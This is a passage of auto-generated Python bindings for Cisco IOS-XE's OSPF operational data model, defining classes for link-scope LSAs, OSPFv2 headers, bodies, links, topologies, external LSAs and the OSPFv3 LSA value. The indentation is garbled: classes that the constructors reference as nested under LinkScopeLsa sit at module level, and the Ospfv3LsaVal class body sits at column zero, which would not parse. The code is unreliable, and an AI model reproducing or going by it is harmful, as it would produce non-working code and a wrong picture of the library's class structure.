                                self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv))])
                                # Leaf metadata: python attribute -> (YLeaf(type, yang-name), accepted python type names).
                                self._leafs = OrderedDict([
                                    ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
                                    ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
                                    ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
                                    ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
                                    ('version', (YLeaf(YType.uint32, 'version'), ['int'])),
                                    ('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])),
                                ])
                                self.lsa_id = None
                                self.adv_router = None
                                self.decoded_completed = None
                                self.raw_data = []  # leaf-list: raw LSA octets
                                self.version = None
                                self.router_address = None
                                # Eagerly built singleton child containers, each linked back to us.
                                self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa()
                                self.ospfv2_lsa.parent = self
                                self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
                                self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal()
                                self.ospfv3_lsa_val.parent = self
                                self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val"
                                self.tlv = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv()
                                self.tlv.parent = self
                                self._children_name_map["tlv"] = "tlv"
                                # Ordered containers for the child list entries.
                                self.ospfv2_link = YList(self)
                                self.ospfv2_topology = YList(self)
                                self.ospfv2_external = YList(self)
                                self.ospfv2_unknown_tlv = YList(self)
                                self.ospfv3_link = YList(self)
                                self.ospfv3_prefix_list = YList(self)
                                self.ospfv3_ia_prefix = YList(self)
                                self.multi_topology = YList(self)
                                self.unknown_sub_tlv = YList(self)
                                # Relative data path segment with both list key predicates.
                                self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']"
                                self._is_frozen = True  # framework flag; set last, after all fields exist
                            def __setattr__(self, name, value):
                                # Delegate writes to Entity._perform_setattr, restricting the writable leaf names.
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value)
                            class Ospfv2Lsa(Entity):
                                """
                                OSPFv2 LSA
                                .. attribute:: header
                                    Decoded OSPFv2 LSA header data
                                    **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header>`
                                    **config**\: False
                                .. attribute:: lsa_body
                                    Decoded OSPFv2 LSA body data
                                    **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody>`
                                    **config**\: False
                                """
                                # YANG module prefix and revision this class was generated from.
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__()
                                    # YANG statement name and the parent statement it hangs under.
                                    self.yang_name = "ospfv2-lsa"
                                    self.yang_parent_name = "link-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []  # container, not a list: no keys
                                    # Child containers: yang-name -> (python attribute, generated class).
                                    self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))])
                                    self._leafs = OrderedDict()  # no direct leaves on this container
                                    # Eagerly built singleton child containers, each linked back to us.
                                    self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header()
                                    self.header.parent = self
                                    self._children_name_map["header"] = "header"
                                    self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody()
                                    self.lsa_body.parent = self
                                    self._children_name_map["lsa_body"] = "lsa-body"
                                    self._segment_path = lambda: "ospfv2-lsa"
                                    self._is_frozen = True  # framework flag; set last, after all fields exist
                                def __setattr__(self, name, value):
                                    # No writable leaves here; still routed through the framework setter.
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value)
                                class Header(Entity):
                                    """
                                    Decoded OSPFv2 LSA header data
                                    .. attribute:: lsa_id
                                        LSA ID
                                        **type**\: str (IPv4 dotted\-quad or IPv6 address, optionally zone\-qualified)
                                        **config**\: False
                                    .. attribute:: opaque_type
                                        Opaque type
                                        **type**\: int
                                        **range:** 0..255
                                        **config**\: False
                                    .. attribute:: opaque_id
                                        Opaque ID
                                        **type**\: int
                                        **range:** 0..4294967295
                                        **config**\: False
                                    .. attribute:: age
                                        LSA age
                                        **type**\: int
                                        **range:** 0..65535
                                        **config**\: False
                                    .. attribute:: type
                                        LSA type
                                        **type**\: int
                                        **range:** 0..65535
                                        **config**\: False
                                    .. attribute:: adv_router
                                        LSA advertising router
                                        **type**\: int
                                        **range:** 0..4294967295
                                        **config**\: False
                                    .. attribute:: seq_num
                                        LSA sequence number
                                        **type**\: str
                                        **config**\: False
                                    .. attribute:: checksum
                                        LSA checksum
                                        **type**\: str
                                        **config**\: False
                                    .. attribute:: length
                                        LSA length
                                        **type**\: int
                                        **range:** 0..65535
                                        **config**\: False
                                    .. attribute:: flag_options
                                        LSA options
                                        **type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>`
                                        **config**\: False
                                    """
                                    # YANG module prefix and revision this class was generated from.
                                    _prefix = 'ospf-ios-xe-oper'
                                    _revision = '2018-02-01'
                                    def __init__(self):
                                        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__()
                                        self.yang_name = "header"
                                        self.yang_parent_name = "ospfv2-lsa"
                                        self.is_top_level_class = False
                                        self.has_list_ancestor = True
                                        self.ylist_key_names = []  # container, not a list: no keys
                                        self._child_classes = OrderedDict([])  # leaf-only node: no child containers
                                        # Leaf metadata: python attribute -> (YLeaf(type, yang-name), accepted python type names).
                                        self._leafs = OrderedDict([
                                            ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                                            ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
                                            ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
                                            ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                                            ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                                            ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                                            ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                                            ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                                            ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                                            ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
                                        ])
                                        self.lsa_id = None
                                        self.opaque_type = None
                                        self.opaque_id = None
                                        self.age = None
                                        self.type = None
                                        self.adv_router = None
                                        self.seq_num = None
                                        self.checksum = None
                                        self.length = None
                                        self.flag_options = Bits()  # YANG 'bits' leaf: starts as an empty bit set
                                        self._segment_path = lambda: "header"
                                        self._is_frozen = True  # framework flag; set last, after all fields exist
                                    def __setattr__(self, name, value):
                                        # Delegate writes to Entity._perform_setattr, restricting the writable leaf names.
                                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
                                class LsaBody(Entity):
                                    """
                                    Decoded OSPFv2 LSA body data
                                    .. attribute:: num_of_links
                                        Number of links
                                        **type**\: int
                                        **range:** 0..65535
                                        **config**\: False
                                    .. attribute:: network
                                        Network details
                                        **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network>`
                                        **config**\: False
                                    .. attribute:: summary_mask
                                        Summary mask
                                        **type**\: str (IPv4 dotted\-quad or IPv6 address, optionally zone\-qualified)
                                        **config**\: False
                                    .. attribute:: external_mask
                                        External mask
                                        **type**\: str (IPv4 dotted\-quad or IPv6 address, optionally zone\-qualified)
                                        **config**\: False
                                    .. attribute:: body_flag_options
                                        LSA body flags
                                        **type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>`
                                        **config**\: False
                                    """
                                    # YANG module prefix and revision this class was generated from.
                                    _prefix = 'ospf-ios-xe-oper'
                                    _revision = '2018-02-01'
                                    def __init__(self):
                                        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
                                        self.yang_name = "lsa-body"
                                        self.yang_parent_name = "ospfv2-lsa"
                                        self.is_top_level_class = False
                                        self.has_list_ancestor = True
                                        self.ylist_key_names = []  # container, not a list: no keys
                                        # Child container: yang-name -> (python attribute, generated class).
                                        self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))])
                                        # Leaf metadata: python attribute -> (YLeaf(type, yang-name), accepted python type names).
                                        self._leafs = OrderedDict([
                                            ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
                                            ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
                                            ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
                                            ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
                                        ])
                                        self.num_of_links = None
                                        self.summary_mask = None
                                        self.external_mask = None
                                        self.body_flag_options = Bits()  # YANG 'bits' leaf: starts as an empty bit set
                                        # Eagerly build the single child container and link it back to us.
                                        self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network()
                                        self.network.parent = self
                                        self._children_name_map["network"] = "network"
                                        self._segment_path = lambda: "lsa-body"
                                        self._is_frozen = True  # framework flag; set last, after all fields exist
                                    def __setattr__(self, name, value):
                                        # Delegate writes to Entity._perform_setattr, restricting the writable leaf names.
                                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
                                    class Network(Entity):
                                        """
                                        Network details
                                        .. attribute:: network_mask
                                            IP network mask
                                            **type**\: str (IPv4 dotted\-quad or IPv6 address, optionally zone\-qualified)
                                            **config**\: False
                                        .. attribute:: attached_router
                                            List of the routers attached to the network
                                            **type**\: list of int
                                            **range:** 0..4294967295
                                            **config**\: False
                                        """
                                        # YANG module prefix and revision this class was generated from.
                                        _prefix = 'ospf-ios-xe-oper'
                                        _revision = '2018-02-01'
                                        def __init__(self):
                                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
                                            self.yang_name = "network"
                                            self.yang_parent_name = "lsa-body"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []  # container, not a list: no keys
                                            self._child_classes = OrderedDict([])  # leaf-only node: no child containers
                                            self._leafs = OrderedDict([
                                                ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
                                                ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                                            ])
                                            self.network_mask = None
                                            self.attached_router = []  # leaf-list of attached router IDs
                                            self._segment_path = lambda: "network"
                                            self._is_frozen = True  # framework flag; set last, after all fields exist
                                        def __setattr__(self, name, value):
                                            # Delegate writes to Entity._perform_setattr, restricting the writable leaf names.
                                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
    """
    OSPFv2 LSA link

    .. attribute:: link_id  (key)

        Link ID

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: link_data  (key)

        Link data

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: type

        Link type

        **type**\: int

        **range:** 0..255

        **config**\: False

    .. attribute:: ospfv2_topology

        Topology specific information

        **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology>`

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the generated YDK entity for the 'ospfv2-link' YANG list."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__()

        self.yang_name = "ospfv2-link"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # This node is itself a keyed YANG list: (link-id, link-data) is the key.
        self.ylist_key_names = ['link_id','link_data']
        self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))])
        # Leaf registry: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
            ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
            ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
        ])
        self.link_id = None
        self.link_data = None
        self.type = None
        self.ospfv2_topology = YList(self)   # child list entries, owned by this node
        # XPath segment includes both key predicates, evaluated lazily.
        self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
        # From here on, __setattr__ only accepts the whitelisted leaf names.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the Entity framework for leaf validation / freeze enforcement.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)


    class Ospfv2Topology(Entity):
        """
        Topology specific information

        .. attribute:: mt_id  (key)

            MT\-ID for topology enabled link

            **type**\: int

            **range:** 0..4294967295

            **config**\: False

        .. attribute:: metric

            Metric for the topology

            **type**\: int

            **range:** 0..65535

            **config**\: False
        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Initialize the generated YDK entity for the per-link 'ospfv2-topology' list."""
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()

            self.yang_name = "ospfv2-topology"
            self.yang_parent_name = "ospfv2-link"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['mt_id']      # keyed list: mt-id is the key
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
            ])
            self.mt_id = None
            self.metric = None
            self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
            # From here on, __setattr__ only accepts the whitelisted leaf names.
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Delegate to the Entity framework for leaf validation / freeze enforcement.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
# NOTE(review): the docstring summary "Summary LSA" mirrors the YANG description
# of this node; the leaves are topology data (mt-id/metric) — verify against the
# Cisco-IOS-XE-ospf-oper model before relying on the summary text.
class Ospfv2Topology(Entity):
    """
    Summary LSA

    .. attribute:: mt_id  (key)

        MT\-ID for topology enabled link

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: metric

        Metric for the topology

        **type**\: int

        **range:** 0..65535

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the generated YDK entity for the LSA-level 'ospfv2-topology' list."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__()

        self.yang_name = "ospfv2-topology"
        self.yang_parent_name = "link-scope-lsa"   # sibling of Ospfv2Link, not nested in it
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['mt_id']           # keyed list: mt-id is the key
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
        # From here on, __setattr__ only accepts the whitelisted leaf names.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the Entity framework for leaf validation / freeze enforcement.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
    """
    External LSA

    .. attribute:: mt_id  (key)

        MT\-ID for topology enabled on the link

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: metric

        Metric for the topology

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: forwarding_address

        Forwarding address

        **type**\: union of the below types:

        **type**\: str

        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

        **type**\: str

        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

        **config**\: False

    .. attribute:: external_route_tag

        Route tag

        **type**\: int

        **range:** 0..4294967295

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the generated YDK entity for the 'ospfv2-external' YANG list."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__()

        self.yang_name = "ospfv2-external"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['mt_id']      # keyed list: mt-id is the key
        self._child_classes = OrderedDict([])
        # Leaf registry: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        self.forwarding_address = None
        self.external_route_tag = None
        self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
        # From here on, __setattr__ only accepts the whitelisted leaf names.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the Entity framework for leaf validation / freeze enforcement.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv2UnknownTlv(Entity):
    """
    OSPFv2 Unknown TLV

    .. attribute:: type  (key)

        TLV type

        **type**\: int

        **range:** 0..65535

        **config**\: False

    .. attribute:: length

        TLV length

        **type**\: int

        **range:** 0..65535

        **config**\: False

    .. attribute:: value

        TLV value

        **type**\: list of int

        **range:** 0..255

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the generated YDK entity for the 'ospfv2-unknown-tlv' YANG list."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__()

        self.yang_name = "ospfv2-unknown-tlv"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['type']       # keyed list: TLV type is the key
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
            ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
            ('value', (YLeafList(YType.uint8, 'value'), ['int'])),   # raw TLV bytes as a leaf-list
        ])
        self.type = None
        self.length = None
        self.value = []
        self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']"
        # From here on, __setattr__ only accepts the whitelisted leaf names.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the Entity framework for leaf validation / freeze enforcement.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value)
class Ospfv3LsaVal(Entity):
"""
OSPFv3 LSA
.. attribute:: header
Decoded OSPFv3 LSA header
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv3 LSA body
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Initialize the generated YDK entity for the 'ospfv3-lsa-val' container.

    Wires up the two fixed child containers (header, lsa-body) and parents
    them to this node; the container itself carries no leafs.
    """
    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__()

    self.yang_name = "ospfv3-lsa-val"
    self.yang_parent_name = "link-scope-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []             # container, not a keyed list
    # Child containers: YANG name -> (python attribute, binding class).
    self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))])
    self._leafs = OrderedDict()           # no leafs directly on this node
    self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header()
    self.header.parent = self
    self._children_name_map["header"] = "header"
    self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody()
    self.lsa_body.parent = self
    self._children_name_map["lsa_body"] = "lsa-body"
    self._segment_path = lambda: "ospfv3-lsa-val"
    # From here on, __setattr__ rejects new attributes (no writable leafs here).
    self._is_frozen = True
def __setattr__(self, name, value):
    # Empty whitelist: this container has no leafs, so after freezing only
    # framework-internal assignments are permitted via _perform_setattr.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value)
class Header(Entity):
    """
    Decoded OSPFv3 LSA header

    .. attribute:: lsa_id

        LSA ID

        **type**\: union of the below types:

        **type**\: str

        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

        **type**\: str

        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

        **config**\: False

    .. attribute:: lsa_header

        LSA header

        **type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader>`

        **config**\: False

    .. attribute:: lsa_hdr_options

        OSPFv3 LSA options

        **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
